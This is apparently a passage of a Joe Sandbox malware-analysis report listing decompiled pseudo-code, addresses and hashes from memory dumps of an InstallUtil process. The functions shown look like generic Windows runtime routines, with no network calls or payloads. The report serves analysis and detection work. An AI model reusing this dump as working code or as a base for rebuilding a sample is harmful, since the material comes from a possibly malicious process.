						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0130B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0130F380(_t67 + 0xc, 0x12a5138, 0x10) == 0) {
								 *0x13b60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E012F4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E012F4E70(0x13b86b0, 0x12f5690, 0, 0) != 0) {
					_t46 = E012CCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x012f4d3b
0x012f4d4d
0x012f4d53
0x012f4d58
0x012f4d65
0x012f4d6c
0x012f4d71
0x012f4d77
0x012f4d7f
0x012f4d8c
0x012f4d8e
0x012f4dad
0x012f4db0
0x012f4db7
0x012f4db8
0x012f4db9
0x012f4dba
0x012f4dbb
0x012f4dc1
0x012f4dc8
0x012f4dcc
0x012f4dd5
0x012f4dde
0x012f4ddf
0x012f4de0
0x012f4de1
0x012f4de6
0x012f4de7
0x012f4de9
0x012f4df3
0x00000000
0x00000000
0x01336c7c
0x01336c8a
0x01336c8a
0x01336c9d
0x01336ca7
0x01336cac
0x01336cb2
0x01336cb9
0x00000000
0x01336cbf
0x01336cbf
0x00000000
0x01336cbf
0x01336cb9
0x012f4dfb
0x01336ccf
0x01336cd3
0x012f4e32
0x012f4e39
0x01336ce0
0x01336cf2
0x01336cf2
0x01336ce0
0x012f4e3f
0x012f4e41
0x012f4e51
0x012f4e51
0x012f4e03
0x012f4e03
0x012f4e09
0x012f4e0f
0x012f4e57
0x00000000
0x00000000
0x012f4e1b
0x012f4e30
0x012f4e5b
0x012f4e5b
0x00000000
0x012f4e30
0x012f4e11
0x012f4e11
0x012f4e16
0x00000000
0x012f4e16
0x012f4e01
0x00000000
0x012f4e01
0x012f4da5
0x01336c6b
0x00000000
0x012f4dab
0x012f4dab
0x00000000
0x012f4dab

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 907f71425e03bf0e1bfb34fd890cc0953740fc088ea448084463d1b7ab6e0741
Instruction ID: 51cbbd85c01ccfa8b4da69d6fa000d4f525cf9254f5a3ec53affd774cc1e1709
Opcode Fuzzy Hash: 907f71425e03bf0e1bfb34fd890cc0953740fc088ea448084463d1b7ab6e0741
Instruction Fuzzy Hash: 1941C371A54358AFEB32EF18CC81FA7B7A9EB54614F0000ADEB4597281D7B0DE44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012D8A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E012D8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x13bd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0130B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E012DE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x12a1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E012F1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01303C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E012D8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x012d8a0a
0x012d8a1c
0x012d8a23
0x012d8a2e
0x012d8a30
0x012d8a36
0x012d8a3c
0x012d8a3e
0x012d8a4a
0x012d8a52
0x012d8a9c
0x012d8aae
0x012d8a58
0x012d8a5e
0x012d8a6a
0x012d8a6f
0x012d8a75
0x012d8a7d
0x012d8a85
0x012d8a86
0x012d8a89
0x012d8a93
0x012d8a99
0x012d8a9b
0x00000000
0x012d8aaf
0x012d8abe
0x012d8ac3
0x012d8acb
0x012d8ad7
0x012d8ae0
0x012d8af1
0x00000000
0x012d8af1
0x012d8acd
0x012d8ad5
0x012d8afb
0x012d8afd
0x012d8aff
0x012d8b07
0x012d8b22
0x012d8b24
0x012d8b2a
0x012d8b2e
0x012d8b3f
0x012d8b78
0x012d8b41
0x012d8b52
0x012d8b54
0x012d8b5c
0x012d8b74
0x012d8b74
0x012d8b5c
0x012d8b3f
0x012d8b5e
0x012d8b61
0x012d8b64
0x012d8b64
0x012d8b6c
0x012d8b6c
0x012d8b11
0x01329cd5
0x01329cd5
0x012d8b17
0x012d8b1a
0x012d8b1a
0x00000000
0x012d8ad5
0x012d8a89

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89a68521ca38e4c96aed186652a463e0f0ce98da59bbf8eebbf296dfd567c5ec
Instruction ID: e518f09de00b5fa3297a2cbe1475c5330767859e8ce9bfe2c2db4969c97f6369
Opcode Fuzzy Hash: 89a68521ca38e4c96aed186652a463e0f0ce98da59bbf8eebbf296dfd567c5ec
Instruction Fuzzy Hash: 19415EB5A5022D9BDB24DF59CC88AB9B7F8FB54300F1045EAD919D7252EB709E80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0138AA16 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0138AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0138ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0138AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0138AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0136CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L012E77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E012E7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0138131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0136CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0138aa1f
0x0138aa21
0x0138aa23
0x0138aa2b
0x0138aa30
0x0138aa36
0x0138aa39
0x0138aa42
0x0138aa75
0x0138aa7a
0x0138aa7c
0x0138aa7c
0x0138aa88
0x0138aa8a
0x0138aa8f
0x0138ab02
0x0138ab04
0x0138aa99
0x0138aaa8
0x0138aaaf
0x0138aab3
0x0138aacc
0x0138aad1
0x0138aad6
0x0138aae0
0x0138aaf3
0x0138aaf9
0x0138aafe
0x0138aafe
0x0138aaf3
0x0138aad6
0x0138aab3
0x0138ab07
0x0138ab0a
0x0138ab11
0x0138ab23
0x0138ab13
0x0138ab1c
0x0138ab1c
0x0138ab2b
0x0138ab44
0x0138ab44
0x0138ab51
0x0138ab51
0x0138aa44
0x0138aa47
0x0138aa4c
0x00000000
0x00000000
0x0138aa5a
0x0138aa64
0x0138aa72
0x00000000
0x0138aa66
0x0138aa66
0x0138aa68
0x0138aa6a
0x00000000
0x0138aa6a

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 194353bf16a688163e04f76785d5bb757ce598c64ba68dc1f106afe9e4d4a2fb
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: AA310632F003096BEB16AB69C845BBFFBBAEF80214F05846AE905A7651DA74CD00C690

Uniqueness

Uniqueness Score: -1.00%

Function 0138FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0138FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0138FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E01390A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E012E7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01381608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E01392B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0138C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0138DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E012E7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0138A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0138fde7
0x0138fde8
0x0138fdec
0x0138fdee
0x0138fdf5
0x0138fdf7
0x0138fdfc
0x0138fe19
0x0138fe22
0x0138fe26
0x0138fec6
0x0138fecd
0x0138fed5
0x0138fee7
0x0138fed7
0x0138fee0
0x0138fee0
0x0138feef
0x0138ff00
0x0138ff02
0x0138ff07
0x0138ff07
0x00000000
0x0138feef
0x0138fe33
0x0138fe55
0x0138fe59
0x0138fe5b
0x0138fe5e
0x0138fe69
0x0138fe6d
0x0138fe6d
0x0138fe69
0x0138fe35
0x0138fe41
0x0138fe41
0x0138fe79
0x0138fe8b
0x0138fe7b
0x0138fe84
0x0138fe84
0x0138fe93
0x00000000
0x0138fea8
0x0138feba
0x00000000
0x0138feba
0x0138fdfe
0x0138fe01
0x0138fe02
0x0138fe08
0x0138ff0c
0x0138ff14
0x0138ff14

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 1dc3611c05113f25d1a981841778d36904f10dbc08eaa76cf4ce75552462bace
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 8A31F432300745AFD722AB6CC844F6ABBEDEBC5658F184058E94ACB782DB75EC41C760

Uniqueness

Uniqueness Score: -1.00%

Function 0138EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0138EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E012E2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0138E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E012CF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E012DFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0138AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0138BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E012E7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0137FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E012DFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0138A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0138ea55
0x0138ea66
0x0138ea68
0x0138ea6c
0x0138ea6f
0x0138ea72
0x0138ea75
0x0138ea7a
0x0138ea7a
0x0138ea7e
0x0138ea80
0x0138ea85
0x0138ea8b
0x0138eab5
0x0138eabc
0x0138eabf
0x0138eabf
0x0138eaca
0x0138eace
0x0138ead0
0x0138eae4
0x0138eaeb
0x0138eaf0
0x0138eaf5
0x0138eb09
0x0138eb0d
0x0138eb1d
0x0138eb2d
0x0138eb38
0x0138eb3d
0x0138eb41
0x0138eb4a
0x0138eb60
0x0138eb4c
0x0138eb52
0x0138eb59
0x0138eb59
0x0138eb68
0x0138eb71
0x0138eb71
0x0138ea8d
0x0138ea8f
0x0138ea92
0x0138ea97
0x0138ea97
0x0138ea9b
0x0138ea9c
0x0138ea9e
0x0138eaa6
0x0138eaa6
0x0138eb7e

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: f6278403326a1034786ea7ab65589acec05c92c82e2a025bcbe0b1ac1d417276
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 8F31D2326147069BD71AEF28CC80A6BB7AAFFC4614F04492DF55687781DE34E805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013469A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E013469A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x13bd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L012D6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01346BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01309980() >= 0) {
							E012E2280(_t56, 0x13b8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x13b8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x13b8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E012CB6F0(0x12ac338, 0x12ac288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01309520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E013095D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E012DFFB0(_t68, _t77, 0x13b8778);
				}
				_pop(_t78);
				return E0130B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x013469b5
0x013469be
0x013469c3
0x013469c9
0x013469cc
0x013469d1
0x013469d3
0x013469de
0x013469e1
0x013469ea
0x013469f6
0x013469fe
0x01346a13
0x01346a14
0x01346a15
0x01346a16
0x01346a1e
0x01346a26
0x01346a31
0x01346a36
0x01346a37
0x01346a40
0x01346a49
0x01346a4a
0x01346a53
0x01346a59
0x01346a5d
0x01346a5e
0x01346a64
0x01346a67
0x01346a6a
0x01346a6d
0x01346a70
0x01346a77
0x01346a7d
0x01346a86
0x01346a89
0x01346a9c
0x01346a9f
0x01346aa2
0x01346aa5
0x01346aaf
0x01346ab1
0x01346ab8
0x01346ab9
0x01346abb
0x01346abe
0x01346ac5
0x01346ac5
0x01346aaf
0x01346a40
0x01346a26
0x013469fe
0x01346ace
0x01346ad0
0x01346ad3
0x01346ad8
0x01346adf
0x01346adf
0x01346ae8
0x01346aef
0x01346aef
0x01346af9
0x01346b06

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2da49aca25f776d9113dbf0d762bcd9c904f1475fbe5d3de74b65d7ae1c2afa3
Instruction ID: 5467dc552c519f8f98f889fbd93f82af8a6bf37525e59f15532b1adc557492f5
Opcode Fuzzy Hash: 2da49aca25f776d9113dbf0d762bcd9c904f1475fbe5d3de74b65d7ae1c2afa3
Instruction Fuzzy Hash: 2941A3B1D006099FDB15CFA9C941BFEBBF8EF49718F148169E514A7240DB70A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012C5210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E012C5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E012C52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E013095D0();
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E012DEB70(_t54, 0x13b79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E013095D0();
								L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E012DEB70(_t54, 0x13b79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0130F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E012DEB70(_t54, 0x13b79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E013095D0();
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x012c5220
0x012c5224
0x01320d13
0x01320d16
0x01320d19
0x012c522a
0x012c522a
0x012c522d
0x012c522d
0x012c5231
0x012c5235
0x012c5239
0x01320d5c
0x01320d62
0x00000000
0x00000000
0x01320d6a
0x01320d7b
0x01320d7f
0x01320d81
0x01320d84
0x01320d95
0x01320d95
0x01320d6c
0x01320d71
0x01320d71
0x01320d9a
0x00000000
0x012c524a
0x012c524a
0x012c5250
0x01320d24
0x01320d35
0x01320d39
0x01320d3b
0x01320d3e
0x01320d50
0x01320d50
0x01320d26
0x01320d2b
0x01320d2b
0x00000000
0x01320d55
0x012c5256
0x012c525b
0x012c5265
0x01320da7
0x012c526b
0x012c526e
0x012c5272
0x01320db1
0x01320db4
0x01320dc5
0x01320dc5
0x012c5272
0x012c5278
0x012c527e
0x012c528a
0x012c528c
0x012c528d
0x00000000
0x012c5280
0x012c5282
0x012c5288
0x012c529f
0x012c5292
0x00000000
0x012c5292
0x00000000
0x012c5288
0x012c527e

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b32b5bbccb9f2874c047c552db6fb9426c1843b2a3507f595e08012fc0e7dbe
Instruction ID: 803f974093660b6c8edfdc8051a9e6bbb91073911dce2abde44aeb4fe15b9026
Opcode Fuzzy Hash: 8b32b5bbccb9f2874c047c552db6fb9426c1843b2a3507f595e08012fc0e7dbe
Instruction Fuzzy Hash: 3031E531262611DBC72AAB18C881B7A7BE6FF50B68F114619F6590B5E1E760F804C791

Uniqueness

Uniqueness Score: -1.00%

Function 01303D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01303D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
